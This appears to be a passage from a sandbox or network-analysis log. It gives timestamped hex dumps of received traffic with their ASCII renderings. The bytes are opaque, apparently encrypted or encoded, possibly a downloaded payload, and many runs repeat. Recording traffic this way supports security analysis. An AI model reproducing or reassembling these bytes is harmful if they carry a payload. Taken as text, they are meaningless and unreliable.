                                          2021-12-23 16:00:51 UTC104INData Raw: 05 12 0a c8 8d f9 b8 64 69 c2 60 1b 5c b8 aa cb bd 2b 0f 8c 82 e1 b4 3a 2e a4 61 83 ee a8 d0 49 24 72 d6 47 d9 f9 cc e5 e9 c2 2c e8 5d 84 c9 4a bc 0b 23 0b 83 95 34 ee 2e c4 61 83 6e 27 50 c8 05 12 ea c8 0d 45 b8 45 b5 22 60 e8 5c 84 aa cb 9d 2a c3 0b 4f 95 34 6e 61 c4 60 4f 6d 27 d0 c9 f1 72 ea 28 8d f9 6c 64 e9 0e e0 e8 dd b8 ca 2b bc 0b 0f 0c 4f 14 80 6e 61 44 61 03 3a 28 4f c9 25 12 d6 48 0c 79 eb 31 e8 41 e0 9c 29 b8 aa 17 bd ab 43 8c 82 e1 b4 ee 62 44 e1 4f 6e 27 30 c8 25 91 09 14 d9 f9 cc e5 69 41 40 fc dd 84 aa 4a bd 2a 43 0c 03 14 94 4e 62 c4 e1 83 6d 28 1c 49 05 91 d6 28 0c 78 cc 65 e9 c2 5f 9c dd 84 aa 4b 9d 2a 43 ec 4f 14 80 6d 62 c4 2d 63 4e f4 1c 95 25 12 ea 48 0d 45 b8 31 e8 0e 60 e8 5c 98 ca 2b bc ab c3 8c 82 15 b3 ee 62 c4 41 63 4e a8 30
                                          Data Ascii: di`\+:.aI$rG,]J#4.an'PEE"`\*O4na`Om'r(ld+OnaDa:(O%Hy1A)CbDOn'0%iA@J*CNbm(I(xe_K*COmb-cN%HE1`\+bAcN0
                                          2021-12-23 16:00:51 UTC108INData Raw: ed f9 6c 65 69 22 60 e8 3d 84 aa 4a bc ab 0f 0c 82 95 94 ee e2 44 61 03 ee f4 50 c9 a5 92 d6 48 0d 79 cc 64 e8 0e 60 1c 29 b7 96 2b bc 2b c3 8c 63 15 34 3a 62 c4 2d 82 4e f4 d0 a9 24 12 09 48 8d 78 ec 45 b5 41 5f e8 dd b7 aa cb bc 0b c3 8c 4f e1 80 4e 62 c4 2d 82 6e 08 50 c8 f1 12 ea 47 d9 79 ec e5 69 c2 40 e8 dd b7 4a 4b bd f7 42 d8 63 15 34 ee 61 c4 e1 63 6d 08 d0 95 24 91 ea 28 0d 78 cc 45 e9 41 2c fc 5c 98 ca 2b 89 2b c3 8c 83 e1 80 6e 2e 44 41 03 6d 08 30 49 a5 5e d6 c8 0d 59 b8 31 e9 41 e0 1b 5c 98 96 cb bc 2a c3 0b 83 95 94 3a e2 90 e1 4f 3a 28 1c c9 f1 92 8a 28 0d 59 ec e5 69 22 60 fc 5c b7 96 4b 3d 2a 23 ec 82 14 34 ee 2e c4 41 63 3a a8 1c c8 a5 12 d6 14 8d 78 cc 65 e9 0e 2c 1c 5d b7 ca 4a bd ab c3 ec 82 14 94 ee 62 a4 41 63 6e a8 d0 c9 25 12 d6
                                          Data Ascii: lei"`=JDaPHyd`)++c4:b-N$HxEA_ONb-nPGyi@JKBc4acm$(xEA,\++n.DAm0I^Y1A\*:O:((Yi"`\K=*#4.Ac:xe,]JbAcn%
                                          2021-12-23 16:00:51 UTC112INData Raw: 22 5f fc 5d 84 c9 4a 3d ab c3 8c 4f e1 b3 3a 62 a4 60 83 3a f4 1c a9 05 12 ea c8 0d 78 cc 45 e8 22 e0 1b 3d 98 4a 4a 3d ab 0f 8c 82 f5 34 6d 42 44 41 03 ee f4 30 49 a5 72 8a 28 ed 78 eb 64 b5 42 e0 e8 5d 98 aa 17 bc 2b c3 8c 83 95 80 ee 2e c3 41 82 3a 27 1c 95 a5 12 09 c8 d9 79 cc 65 69 22 60 1c 29 84 ca 17 89 2a 43 0c 4f 15 80 ee 2e c4 41 03 6e 08 d0 95 a5 92 09 47 0c 59 6c 45 c9 42 40 9c 3d b7 4a 4a bd 2b 0f 8c 4f e1 34 4e 62 c4 60 82 6d a8 1c a9 f1 5e 09 14 8d 78 cc 31 e9 22 e0 1c 5d 84 96 2b 9d 2b 42 0b 63 15 80 6e 2e c4 60 03 4e a8 d0 c9 05 72 ea 48 0d f9 6c 65 b5 42 2c 1c dd 38 4a 4b bd 2a 0f 0b 03 95 94 6e 62 a4 e1 63 6e 08 1c c8 a5 92 d6 47 ed 59 eb 45 c9 c2 40 9c 5c 84 aa cb 3d 0b 42 d8 63 15 94 4e 61 90 61 82 6e a8 50 c9 25 92 0a 48 ed f9 6c e5
                                          Data Ascii: "_]J=O:b`:xE"=JJ=4mBDA0Ir(xdB]+.A:'yei"`)*CO.AnGYlEB@=JJ+O4Nb`m^x1"]++Bcn.`NrHleB,8JK*nbcnGYE@\=BcNaanP%Hl
                                          2021-12-23 16:00:51 UTC116INData Raw: 38 ca 2b bd f7 43 0b 83 f5 b3 ee 61 a4 2d 83 3a a8 d0 c9 24 72 d6 48 0d 79 eb 64 b5 0e e0 1b 29 84 c9 17 9d 2b 42 ec 63 e1 b4 4e 61 c3 60 82 4e 28 50 a9 f1 12 ea 47 ed f9 cc 65 b5 42 5f e8 5d b8 ca 4a bd f7 0f d8 63 e1 b4 ee 61 c4 61 03 6d 08 d0 c8 24 91 8a c8 0d 59 cc 65 e9 22 e0 1b 5d 98 c9 cb 3d f7 43 0b 82 15 34 ee 42 c3 2d 63 4e 27 30 a9 05 5e 0a 48 0d 59 b8 65 c9 0e 60 9c 5c 38 c9 cb bc 2a 43 d8 03 e1 80 6d 2e a4 41 83 ee a8 4f a9 05 5e 09 c8 8d 59 ec 45 69 41 2c 9c 5d 98 ca 4b 3d 2b 0f d8 4f 15 b4 ee 62 c4 61 82 4e 28 4f 95 f1 91 0a c8 d9 45 b8 64 e9 0e e0 fc 5d b7 96 4a bc f7 43 0c 03 14 94 ee e2 c4 2d 03 4e 27 d0 c8 a5 72 ea 28 ed 59 cc 64 b5 22 2c e8 dd 84 c9 4a 3d 2b 23 8c 4f 14 80 6e 62 c3 41 82 4e 28 4f 49 24 92 09 47 0d 59 ec e5 b5 41 e0 e8
                                          Data Ascii: 8+Ca-:$rHyd)+BcNa`N(PGeB_]Jcaam$Ye"]=C4B-cN'0^HYe`\8*Cm.AO^YEiA,]K=+ObaN(OEd]JC-N'r(Yd",J=+#OnbAN(OI$GYA
                                          2021-12-23 16:00:51 UTC121INData Raw: 42 0c 03 f5 94 6e 62 44 2d 83 4e f4 d0 95 25 12 09 48 d9 45 6c 65 e8 0e e0 1b dd 84 c9 4b bc f7 c3 ec 63 14 b4 4e 61 c4 2d 83 3a f4 30 49 f1 72 d6 48 8d f9 eb e5 e8 42 5f e8 5d 38 c9 4b 3d ab 0f 8c 4f e1 b3 6e e2 90 41 83 ee f4 50 a9 05 92 09 14 0c 45 eb e5 b5 22 2c fc 29 38 4a 17 bd 2a 23 d8 4f 95 b4 6e 61 90 41 63 6e 08 50 49 24 12 ea 28 8d 59 6c 65 e9 42 2c 1c 5c 98 96 4b bd 0b 42 ec 82 e1 80 4e e2 a4 e1 83 ee 28 30 95 05 92 09 c8 0d 78 ec 64 e9 22 40 e8 29 98 96 4b bd 2b 0f 0b 83 14 80 4e 62 a4 61 82 3a 28 d0 c8 05 72 d6 48 8d 79 b8 45 69 0e 40 1c 5d b7 ca cb 3d 2b 42 8c 83 e1 b4 6d 42 c3 60 82 6d 27 4f 49 05 72 09 28 ed 59 cc 45 c9 0e 40 fc 5d 98 c9 17 3d f7 43 0b 83 f5 94 6e 2e c4 e1 4f 6d 08 30 49 f1 5e 09 28 d9 78 6c e5 c9 0e 40 e8 5d b7 4a 17 bc
                                          Data Ascii: BnbD-N%HEleKcNa-:0IrHB_]8K=OnAPE",)8J*#OnaAcnPI$(YleB,\KBN(0xd"@)K+Nba:(rHyEi@]=+BmB`m'OIr(YE@]=Cn.Om0I^(xl@]J
                                          2021-12-23 16:00:51 UTC125INData Raw: 34 4e 2e c3 e1 4f 4e 28 1c a9 a5 72 ea 48 0d 59 ec 65 c9 41 60 1c 5d b8 96 4b 9d ab 43 8c 63 15 94 3a 61 90 60 4f ee a8 d0 a9 a5 12 d6 c8 ed 45 ec 65 e9 41 2c 1b 29 84 4a 4a bc 0b 23 ec 83 15 80 4e 2e 90 e1 03 4e 08 4f 49 25 12 ea 28 d9 78 ec 31 c9 c2 2c 9c 5d b7 96 17 89 2b 0f d8 83 14 b4 6d e2 a4 60 83 6e f4 50 95 a5 5e 09 14 d9 79 b8 64 b5 41 40 fc 3d b8 ca 2b bd 2b 43 ec 83 14 34 6d 42 c3 41 03 3a 27 50 c8 25 12 8a c8 ed 78 cc 64 b5 0e 60 9c 5c 38 4a 2b 89 ab 42 0b 63 95 b3 ee 62 c4 e1 82 ee 28 50 a9 24 5e 0a 14 8d 45 6c 65 e9 0e 40 e8 29 84 aa 4b 89 ab 23 0b 03 f5 94 4e 42 44 41 83 6d 08 4f c8 f1 72 0a 14 0d 78 b8 e5 69 0e 2c e8 29 b7 ca 4a 89 2a 42 d8 63 15 80 6e 62 a4 61 83 4e a8 4f 95 f1 12 ea 14 d9 45 ec e5 69 41 40 fc dd 38 ca 2b bc 2a 23 0b 82
                                          Data Ascii: 4N.ON(rHYeA`]KCc:a`OEeA,)JJ#N.NOI%(x1,]+m`nP^ydA@=++C4mBA:'P%xd`\8J+Bcb(P$^Ele@)K#NBDAmOrxi,)J*BcnbaNOEiA@8+*#
                                          2021-12-23 16:00:51 UTC128INData Raw: 8c 4f e1 80 4e 62 c4 2d 82 6e 08 50 c8 f1 12 ea 47 d9 79 ec e5 69 c2 40 e8 dd b7 4a 4b bd f7 42 d8 63 15 34 ee 61 c4 e1 63 6d 08 d0 95 24 91 ea 28 0d 78 cc 45 e9 41 2c fc 5c 98 ca 2b 89 2b c3 8c 83 e1 80 6e 2e 44 41 03 6d 08 30 49 a5 5e d6 c8 0d 59 b8 31 e9 41 e0 1b 5c 98 96 cb bc 2a c3 0b 83 95 94 3a e2 90 e1 4f 3a 28 1c c9 f1 92 8a 28 0d 59 ec e5 69 22 60 fc 5c b7 96 4b 3d 2a 23 ec 82 14 34 ee 2e c4 41 63 3a a8 1c c8 a5 12 d6 14 8d 78 cc 65 e9 0e 2c 1c 5d b7 ca 4a bd ab c3 ec 82 14 94 ee 62 a4 41 63 6e a8 d0 c9 25 12 d6 47 d9 79 cc 31 69 42 e0 e8 3d 38 4a 4a bc 2b 43 0c 83 14 b4 ee 62 a4 60 63 ee f4 30 c8 25 72 8a 48 d9 79 ec 45 69 42 60 e8 3d b8 aa 2b bc 2b 43 0b 4f e1 34 3a 42 a4 61 83 4e 08 d0 a9 05 12 ea 28 0c f9 cc 31 b5 0e 2c 1c 3d 98 4a 2b bc 0b
                                          Data Ascii: ONb-nPGyi@JKBc4acm$(xEA,\++n.DAm0I^Y1A\*:O:((Yi"`\K=*#4.Ac:xe,]JbAcn%Gy1iB=8JJ+Cb`c0%rHyEiB`=++CO4:BaN(1,=J+
                                          2021-12-23 16:00:51 UTC132INData Raw: 2e c3 41 82 3a 27 1c 95 a5 12 09 c8 d9 79 cc 65 69 22 60 1c 29 84 ca 17 89 2a 43 0c 4f 15 80 ee 2e c4 41 03 6e 08 d0 95 a5 92 09 47 0c 59 6c 45 c9 42 40 9c 3d b7 4a 4a bd 2b 0f 8c 4f e1 34 4e 62 c4 60 82 6d a8 1c a9 f1 5e 09 14 8d 78 cc 31 e9 22 e0 1c 5d 84 96 2b 9d 2b 42 0b 63 15 80 6e 2e c4 60 03 4e a8 d0 c9 05 72 ea 48 0d f9 6c 65 b5 42 2c 1c dd 38 4a 4b bd 2a 0f 0b 03 95 94 6e 62 a4 e1 63 6e 08 1c c8 a5 92 d6 47 ed 59 eb 45 c9 c2 40 9c 5c 84 aa cb 3d 0b 42 d8 63 15 94 4e 61 90 61 82 6e a8 50 c9 25 92 0a 48 ed f9 6c e5 b5 42 5f e8 3d 98 aa 4b 3d ab c3 0c 82 e1 b3 6e e2 c3 e1 63 4e a8 1c c9 a5 12 8a 28 0c 79 cc 31 e8 41 60 e8 29 38 4a 4a 3d ab c3 ec 03 95 80 6d 42 44 e1 03 6d 08 50 a9 25 92 0a 48 0c f9 6c 64 e8 c2 5f fc 5c 38 4a cb 89 2b 0f d8 82 15 b3
                                          Data Ascii: .A:'yei"`)*CO.AnGYlEB@=JJ+O4Nb`m^x1"]++Bcn.`NrHleB,8JK*nbcnGYE@\=BcNaanP%HlB_=K=ncN(y1A`)8JJ=mBDmP%Hld_\8J+
                                          2021-12-23 16:00:51 UTC136INData Raw: 6d 08 d0 c8 24 91 8a c8 0d 59 cc 65 e9 22 e0 1b 5d 98 c9 cb 3d f7 43 0b 82 15 34 ee 42 c3 2d 63 4e 27 30 a9 05 5e 0a 48 0d 59 b8 65 c9 0e 60 9c 5c 38 c9 cb bc 2a 43 d8 03 e1 80 6d 2e a4 41 83 ee a8 4f a9 05 5e 09 c8 8d 59 ec 45 69 41 2c 9c 5d 98 ca 4b 3d 2b 0f d8 4f 15 b4 ee 62 c4 61 82 4e 28 4f 95 f1 91 0a c8 d9 45 b8 64 e9 0e e0 fc 5d b7 96 4a bc f7 43 0c 03 14 94 ee e2 c4 2d 03 4e 27 d0 c8 a5 72 ea 28 ed 59 cc 64 b5 22 2c e8 dd 84 c9 4a 3d 2b 23 8c 4f 14 80 6e 62 c3 41 82 4e 28 4f 49 24 92 09 47 0d 59 ec e5 b5 41 e0 e8 5c 84 aa 2b 3d ab 0f d8 82 e1 b4 6e 2e 90 2d 83 4e a8 4f 49 05 92 d6 48 ed 45 cc e5 b5 41 e0 e8 5d b8 4a 2b bd ab 42 ec 03 e1 80 3a 2e 90 2d 4f ee 28 d0 95 25 72 d6 c8 8d 45 cc 31 b5 c2 e0 fc 5c 84 ca 4a 9d 2a c3 d8 4f e1 b4 6d 2e c3 e1
                                          Data Ascii: m$Ye"]=C4B-cN'0^HYe`\8*Cm.AO^YEiA,]K=+ObaN(OEd]JC-N'r(Yd",J=+#OnbAN(OI$GYA\+=n.-NOIHEA]J+B:.-O(%rE1\J*Om.
                                          2021-12-23 16:00:51 UTC140INData Raw: 92 09 14 0c 45 eb e5 b5 22 2c fc 29 38 4a 17 bd 2a 23 d8 4f 95 b4 6e 61 90 41 63 6e 08 50 49 24 12 ea 28 8d 59 6c 65 e9 42 2c 1c 5c 98 96 4b bd 0b 42 ec 82 e1 80 4e e2 a4 e1 83 ee 28 30 95 05 92 09 c8 0d 78 ec 64 e9 22 40 e8 29 98 96 4b bd 2b 0f 0b 83 14 80 4e 62 a4 61 82 3a 28 d0 c8 05 72 d6 48 8d 79 b8 45 69 0e 40 1c 5d b7 ca cb 3d 2b 42 8c 83 e1 b4 6d 42 c3 60 82 6d 27 4f 49 05 72 09 28 ed 59 cc 45 c9 0e 40 fc 5d 98 c9 17 3d f7 43 0b 83 f5 94 6e 2e c4 e1 4f 6d 08 30 49 f1 5e 09 28 d9 78 6c e5 c9 0e 40 e8 5d b7 4a 17 bc 2a 43 8c 63 95 b4 6e 2e a4 2d 82 4e 08 4f c9 a5 5e 0a c8 8d 78 cc 31 e9 41 40 e8 29 84 c9 4b bc 2b 23 ec 03 95 34 3a 62 c3 61 4f 3a f4 d0 a9 24 91 0a 48 0d 59 6c 45 c9 c2 e0 fc 29 b7 ca 4b bc 2b 0f 0c 83 15 b3 6e e2 c3 61 03 3a 08 d0 a9
                                          Data Ascii: E",)8J*#OnaAcnPI$(YleB,\KBN(0xd"@)K+Nba:(rHyEi@]=+BmB`m'OIr(YE@]=Cn.Om0I^(xl@]J*Ccn.-NO^x1A@)K+#4:baO:$HYlE)K+na:
                                          2021-12-23 16:00:51 UTC144INData Raw: 78 ec 31 c9 c2 2c 9c 5d b7 96 17 89 2b 0f d8 83 14 b4 6d e2 a4 60 83 6e f4 50 95 a5 5e 09 14 d9 79 b8 64 b5 41 40 fc 3d b8 ca 2b bd 2b 43 ec 83 14 34 6d 42 c3 41 03 3a 27 50 c8 25 12 8a c8 ed 78 cc 64 b5 0e 60 9c 5c 38 4a 2b 89 ab 42 0b 63 95 b3 ee 62 c4 e1 82 ee 28 50 a9 24 5e 0a 14 8d 45 6c 65 e9 0e 40 e8 29 84 aa 4b 89 ab 23 0b 03 f5 94 4e 42 44 41 83 6d 08 4f c8 f1 72 0a 14 0d 78 b8 e5 69 0e 2c e8 29 b7 ca 4a 89 2a 42 d8 63 15 80 6e 62 a4 61 83 4e a8 4f 95 f1 12 ea 14 d9 45 ec e5 69 41 40 fc dd 38 ca 2b bc 2a 23 0b 82 f5 b3 6d e2 c4 2d 4f ee 28 50 c8 24 91 09 c8 d9 79 eb 65 e9 22 5f fc 3d 38 ca cb 89 f7 c3 d8 63 f5 80 6e 61 a4 41 63 ee 28 1c c9 05 92 ea 28 0c 45 6c 64 e9 0e 5f fc 5c 98 c9 2b 9d f7 23 0c 82 15 b3 4e 62 44 e1 4f 6e a8 30 49 f1 92 8a 48
                                          Data Ascii: x1,]+m`nP^ydA@=++C4mBA:'P%xd`\8J+Bcb(P$^Ele@)K#NBDAmOrxi,)J*BcnbaNOEiA@8+*#m-O(P$ye"_=8cnaAc((Eld_\+#NbDOn0IH
                                          2021-12-23 16:00:51 UTC148INData Raw: 0e 40 fc 5d 38 ca 4b 3d 2b 43 d8 03 f5 34 ee 62 c3 41 83 3a a8 50 c8 a5 92 ea 14 0c 78 b8 65 e8 41 5f 9c 5d b7 aa 4a 9d f7 43 8c 82 14 34 6e e2 c4 61 82 4e a8 4f c8 25 91 09 48 8d f9 eb 64 e9 22 60 1b 5d 98 aa cb bc 2b c3 ec 82 e1 b4 4e 61 44 60 83 ee 27 4f 49 25 72 ea 14 0c 78 eb 64 e8 41 2c 9c 29 b7 c9 4b 3d 2a 43 0b 63 15 94 4e e2 44 61 63 4e f4 50 c8 24 72 8a 48 0c 79 ec 31 69 42 60 1b 5d b7 ca 4a bc 2a 43 0c 83 14 94 6d 62 c3 2d 4f 6e a8 50 c8 25 5e d6 48 d9 79 ec 45 b5 0e 2c e8 29 98 ca 4a 9d 2a 23 0c 83 14 80 6e 42 c4 2d 63 ee 08 50 49 f1 12 09 47 0c 59 6c 65 b5 0e 5f 1b 3d b7 ca 2b 3d 0b c3 8c 82 f5 94 6d 42 44 2d 4f 6e 28 30 95 f1 5e ea c8 0c 45 6c 64 e9 c2 2c e8 29 b7 4a cb 89 0b 23 0b 03 95 94 6d 61 a4 61 4f 3a 28 30 49 24 5e ea 28 8d 79 6c 65
                                          Data Ascii: @]8K=+C4bA:PxeA_]JC4naNO%Hd"`]+NaD`'OI%rxdA,)K=*CcNDacNP$rHy1iB`]J*Cmb-OnP%^HyE,)J*#nB-cPIGYle_=+=mBD-On(0^Eld,)J#maaO:(0I$^(yle
                                          2021-12-23 16:00:51 UTC153INData Raw: c9 4a bc 2a 23 8c 4f f5 b4 3a 42 90 61 03 4e 08 1c c8 05 92 d6 14 d9 f9 cc 45 e8 c2 2c fc 5c 38 96 2b 3d 0b 43 0b 03 f5 80 4e e2 44 e1 82 3a 28 4f c9 f1 72 ea c8 0d 59 ec 45 c9 0e 40 1c 5d 84 c9 4a 89 2a 23 ec 82 15 b3 3a e2 a4 61 83 3a 28 50 c9 25 72 0a 14 0c 59 cc 31 e8 0e e0 e8 5d 98 aa cb bd 0b c3 8c 4f 14 80 4e e2 90 41 63 6e f4 1c 49 05 91 09 c8 8d 78 ec 65 69 0e 5f e8 5c 38 4a 2b 89 f7 c3 8c 03 e1 34 6e 2e 90 41 4f 4e 28 d0 a9 25 91 ea 28 0c 59 6c 31 b5 42 40 1c 3d 38 96 2b 3d 2a 42 0c 83 f5 80 6d 2e c4 60 03 4e 08 50 c8 24 72 0a 14 0d 79 6c 45 b5 c2 5f 1b 5c 38 4a 4a 9d 2a 23 8c 03 15 b4 ee 61 c3 41 82 ee 28 1c c9 f1 91 0a 48 d9 59 cc e5 e9 41 5f 9c 3d 38 c9 cb bd f7 42 ec 4f f5 b3 6d 42 c4 41 4f 6e 27 1c c8 a5 92 0a 48 0d 78 b8 65 b5 c2 60 e8 3d
                                          Data Ascii: J*#O:BaNE,\8+=CND:(OrYE@]J*#:a:(P%rY1]ONAcnIxei_\8J+4n.AON(%(Yl1B@=8+=*Bm.`NP$rylE_\8JJ*#aA(HYA_=8BOmBAOn'Hxe`=
                                          2021-12-23 16:00:51 UTC157INData Raw: 0f 0b 63 e1 80 ee 62 c3 61 63 6d a8 d0 95 05 91 0a 48 d9 45 b8 64 69 42 2c 1b dd 98 aa 17 bc ab 42 8c 83 15 94 3a e2 90 41 83 6e a8 4f a9 24 12 ea 28 ed 79 b8 e5 c9 c2 60 1c 5d b8 ca 4a 3d 0b 43 d8 63 f5 80 ee 42 a4 e1 4f 6d 08 30 c9 05 91 ea 28 0c 79 ec 31 69 c2 40 fc dd 84 4a cb 89 0b 43 8c 4f 95 b4 3a 62 c4 2d 63 ee a8 50 c8 a5 12 8a 48 0c f9 ec e5 e8 41 5f 1c 29 b7 aa 2b bc 2a 42 0c 03 e1 34 4e 61 90 41 03 6e 28 4f c9 05 5e 8a 28 0d 78 6c 45 e8 0e 60 e8 dd 98 4a cb bd 2b 42 0b 4f e1 80 ee 42 90 e1 4f 4e a8 1c 95 f1 91 d6 47 8d 79 eb 65 69 0e 60 fc 5d 38 ca 17 89 ab 23 ec 83 15 80 6d 2e c4 61 83 6e 28 4f c8 24 12 09 c8 0c 45 b8 64 b5 c2 5f 9c 5d 98 96 cb 9d 2a 0f ec 63 15 b3 ee 61 c4 61 82 6e 27 30 c9 05 72 09 47 d9 79 eb 64 c9 0e 2c e8 5c 38 ca 4b bc
                                          Data Ascii: cbacmHEdiB,B:AnO$(y`]J=CcBOm0(y1i@JCO:b-cPHA_)+*B4NaAn(O^(xlE`J+BOBONGyei`]8#m.an(O$Ed_]*caan'0rGyd,\8K
                                          2021-12-23 16:00:51 UTC160INData Raw: 4b bd 2b 0f 0b 83 14 80 4e 62 a4 61 82 3a 28 d0 c8 05 72 d6 48 8d 79 b8 45 69 0e 40 1c 5d b7 ca cb 3d 2b 42 8c 83 e1 b4 6d 42 c3 60 82 6d 27 4f 49 05 72 09 28 ed 59 cc 45 c9 0e 40 fc 5d 98 c9 17 3d f7 43 0b 83 f5 94 6e 2e c4 e1 4f 6d 08 30 49 f1 5e 09 28 d9 78 6c e5 c9 0e 40 e8 5d b7 4a 17 bc 2a 43 8c 63 95 b4 6e 2e a4 2d 82 4e 08 4f c9 a5 5e 0a c8 8d 78 cc 31 e9 41 40 e8 29 84 c9 4b bc 2b 23 ec 03 95 34 3a 62 c3 61 4f 3a f4 d0 a9 24 91 0a 48 0d 59 6c 45 c9 c2 e0 fc 29 b7 ca 4b bc 2b 0f 0c 83 15 b3 6e e2 c3 61 03 3a 08 d0 a9 f1 5e ea 14 0d 45 eb 65 b5 0e 40 1b 3d 98 4a 2b 89 ab 43 0c 82 14 80 6e 42 c3 2d 4f 6d f4 d0 c8 05 92 8a 28 0c 78 ec 65 c9 0e 60 1c 29 38 aa 17 bc ab 43 0c 63 95 34 ee 2e c4 60 83 6e 08 4f c9 f1 92 ea c8 0c 79 ec 65 b5 42 40 1b 5d 84
                                          Data Ascii: K+Nba:(rHyEi@]=+BmB`m'OIr(YE@]=Cn.Om0I^(xl@]J*Ccn.-NO^x1A@)K+#4:baO:$HYlE)K+na:^Ee@=J+CnB-Om(xe`)8Cc4.`nOyeB@]
                                          2021-12-23 16:00:51 UTC164INData Raw: 0b 63 95 b3 ee 62 c4 e1 82 ee 28 50 a9 24 5e 0a 14 8d 45 6c 65 e9 0e 40 e8 29 84 aa 4b 89 ab 23 0b 03 f5 94 4e 42 44 41 83 6d 08 4f c8 f1 72 0a 14 0d 78 b8 e5 69 0e 2c e8 29 b7 ca 4a 89 2a 42 d8 63 15 80 6e 62 a4 61 83 4e a8 4f 95 f1 12 ea 14 d9 45 ec e5 69 41 40 fc dd 38 ca 2b bc 2a 23 0b 82 f5 b3 6d e2 c4 2d 4f ee 28 50 c8 24 91 09 c8 d9 79 eb 65 e9 22 5f fc 3d 38 ca cb 89 f7 c3 d8 63 f5 80 6e 61 a4 41 63 ee 28 1c c9 05 92 ea 28 0c 45 6c 64 e9 0e 5f fc 5c 98 c9 2b 9d f7 23 0c 82 15 b3 4e 62 44 e1 4f 6e a8 30 49 f1 92 8a 48 0c 79 eb 65 69 41 5f e8 dd b7 96 17 bd 2b 43 8c 82 e1 b4 3a 62 a4 e1 03 4e 27 50 95 05 12 0a 14 8d 45 cc 64 e8 c2 e0 9c 3d b7 4a 2b bc 0b c3 0b 4f 15 b4 6e 2e c4 60 63 6e f4 50 c9 25 12 8a 28 d9 59 6c 45 b5 0e 2c fc dd 38 aa 17 bc f7
                                          Data Ascii: cb(P$^Ele@)K#NBDAmOrxi,)J*BcnbaNOEiA@8+*#m-O(P$ye"_=8cnaAc((Eld_\+#NbDOn0IHyeiA_+C:bN'PEd=J+On.`cnP%(YlE,8
                                          2021-12-23 16:00:51 UTC168INData Raw: 4e 61 44 60 83 ee 27 4f 49 25 72 ea 14 0c 78 eb 64 e8 41 2c 9c 29 b7 c9 4b 3d 2a 43 0b 63 15 94 4e e2 44 61 63 4e f4 50 c8 24 72 8a 48 0c 79 ec 31 69 42 60 1b 5d b7 ca 4a bc 2a 43 0c 83 14 94 6d 62 c3 2d 4f 6e a8 50 c8 25 5e d6 48 d9 79 ec 45 b5 0e 2c e8 29 98 ca 4a 9d 2a 23 0c 83 14 80 6e 42 c4 2d 63 ee 08 50 49 f1 12 09 47 0c 59 6c 65 b5 0e 5f 1b 3d b7 ca 2b 3d 0b c3 8c 82 f5 94 6d 42 44 2d 4f 6e 28 30 95 f1 5e ea c8 0c 45 6c 64 e9 c2 2c e8 29 b7 4a cb 89 0b 23 0b 03 95 94 6d 61 a4 61 4f 3a 28 30 49 24 5e ea 28 8d 79 6c 65 e9 22 e0 fc 3d 98 aa 4a 9d 2a 42 0b 83 f5 80 ee e2 c3 61 4f ee 28 4f c9 25 5e 0a 47 8d 59 b8 31 69 22 40 1b 5d b8 aa cb 3d ab 43 0b 83 95 34 ee 62 a4 60 82 4e 08 4f c9 a5 91 09 c8 ed f9 ec 64 b5 c2 60 9c 5c b7 aa 2b 89 0b 23 0b 83 f5
                                          Data Ascii: NaD`'OI%rxdA,)K=*CcNDacNP$rHy1iB`]J*Cmb-OnP%^HyE,)J*#nB-cPIGYle_=+=mBD-On(0^Eld,)J#maaO:(0I$^(yle"=J*BaO(O%^GY1i"@]=C4b`NOd`\+#
                                          2021-12-23 16:00:51 UTC172INData Raw: 3a 28 50 c9 25 72 0a 14 0c 59 cc 31 e8 0e e0 e8 5d 98 aa cb bd 0b c3 8c 4f 14 80 4e e2 90 41 63 6e f4 1c 49 05 91 09 c8 8d 78 ec 65 69 0e 5f e8 5c 38 4a 2b 89 f7 c3 8c 03 e1 34 6e 2e 90 41 4f 4e 28 d0 a9 25 91 ea 28 0c 59 6c 31 b5 42 40 1c 3d 38 96 2b 3d 2a 42 0c 83 f5 80 6d 2e c4 60 03 4e 08 50 c8 24 72 0a 14 0d 79 6c 45 b5 c2 5f 1b 5c 38 4a 4a 9d 2a 23 8c 03 15 b4 ee 61 c3 41 82 ee 28 1c c9 f1 91 0a 48 d9 59 cc e5 e9 41 5f 9c 3d 38 c9 cb bd f7 42 ec 4f f5 b3 6d 42 c4 41 4f 6e 27 1c c8 a5 92 0a 48 0d 78 b8 65 b5 c2 60 e8 3d 98 4a cb bc 2a 43 ec 63 15 34 6d 62 90 e1 63 6d 08 30 c9 05 5e d6 47 0c f9 b8 64 b5 0e 60 e8 dd 84 96 2b bd ab 23 8c 4f 14 b4 3a 42 a4 41 03 4e 28 30 c9 a5 5e 8a 47 8d 79 eb e5 e8 c2 5f 1b 5c 98 96 cb 9d ab 43 8c 03 95 80 6d e2 44 61
                                          Data Ascii: :(P%rY1]ONAcnIxei_\8J+4n.AON(%(Yl1B@=8+=*Bm.`NP$rylE_\8JJ*#aA(HYA_=8BOmBAOn'Hxe`=J*Cc4mbcm0^Gd`+#O:BAN(0^Gy_\CmDa
                                          2021-12-23 16:00:51 UTC176INData Raw: 05 91 ea 28 0c 79 ec 31 69 c2 40 fc dd 84 4a cb 89 0b 43 8c 4f 95 b4 3a 62 c4 2d 63 ee a8 50 c8 a5 12 8a 48 0c f9 ec e5 e8 41 5f 1c 29 b7 aa 2b bc 2a 42 0c 03 e1 34 4e 61 90 41 03 6e 28 4f c9 05 5e 8a 28 0d 78 6c 45 e8 0e 60 e8 dd 98 4a cb bd 2b 42 0b 4f e1 80 ee 42 90 e1 4f 4e a8 1c 95 f1 91 d6 47 8d 79 eb 65 69 0e 60 fc 5d 38 ca 17 89 ab 23 ec 83 15 80 6d 2e c4 61 83 6e 28 4f c8 24 12 09 c8 0c 45 b8 64 b5 c2 5f 9c 5d 98 96 cb 9d 2a 0f ec 63 15 b3 ee 61 c4 61 82 6e 27 30 c9 05 72 09 47 d9 79 eb 64 c9 0e 2c e8 5c 38 ca 4b bc ab 0f d8 82 f5 80 3a 42 c4 41 03 4e f4 4f 49 a5 72 ea 47 d9 78 cc 64 69 0e 2c 1b dd 38 c9 2b 89 ab 43 d8 03 f5 b4 ee 62 44 e1 83 6d a8 50 49 25 92 8a 48 d9 79 b8 e5 c9 42 e0 1b dd 84 aa 4a 3d 0b 23 0c 63 95 34 6e e2 a4 61 4f 4e f4 30
                                          Data Ascii: (y1i@JCO:b-cPHA_)+*B4NaAn(O^(xlE`J+BOBONGyei`]8#m.an(O$Ed_]*caan'0rGyd,\8K:BANOIrGxdi,8+CbDmPI%HyBJ=#c4naON0
